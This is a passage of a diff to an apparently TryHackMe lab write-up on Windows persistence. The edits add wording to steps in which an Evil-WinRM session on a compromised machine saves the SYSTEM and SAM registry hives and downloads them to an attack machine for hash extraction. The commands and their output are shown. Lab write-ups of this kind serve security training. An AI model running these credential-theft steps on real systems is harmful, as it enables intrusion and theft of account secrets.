JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/Tampering With Unprivileged Accounts.md

 NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label            S-1-16-12288
 ```
-9. `cd \` to change to the compromised Windows machine's filesystem root directory to ensure that we'll be executing the following commands from starting from there
+9. `cd \` from the command line in our active WinRM session to change to the compromised Windows machine's filesystem root directory to ensure that we'll be executing the following commands from starting from there
 ```Bash
 *Evil-WinRM* PS C:\Users\thmuser1\Documents> cd \
 ```
-10. `reg save hklm\system {FILENAME1}.bak` to create and save a backup file of the compromised Windows machine's **System** registry key, which successfully created the backup file on the compromised machine
+10. `reg save hklm\system {FILENAME1}.bak` from the command line in our active WinRM session to create and save a backup file of the compromised Windows machine's **System** registry key, which successfully created the backup file on the compromised machine
 ```Bash
 *Evil-WinRM* PS C:\> reg save hklm\system SYSTEM.bak The operation completed successfully.

 ```
-11. `reg save hklm\sam {FILENAME2}.bak` to create and save a backup file of the compromised Windows machine's **SAM** registry key, which successfully created the backup file on the compromised machine
+11. `reg save hklm\sam {FILENAME2}.bak` from the command line in our active WinRM session to create and save a backup file of the compromised Windows machine's **SAM** registry key, which successfully created the backup file on the compromised machine
 ```Bash
 *Evil-WinRM* PS C:\> reg save hklm\sam SAM.bak
 The operation completed successfully.

 ```
-12. `download {FILENAME1}.bak` to download the backup file of the compromised Windows machine's **System** registry key from their system onto our Linux attack machine
+12. `download {FILENAME1}.bak` from the command line in our active WinRM session to download the backup file of the compromised Windows machine's **System** registry key from their system onto our Linux attack machine
 ```Bash
 *Evil-WinRM* PS C:\> download SYSTEM.bak
 Info: Downloading C:\\SYSTEM.bak to SYSTEM.bak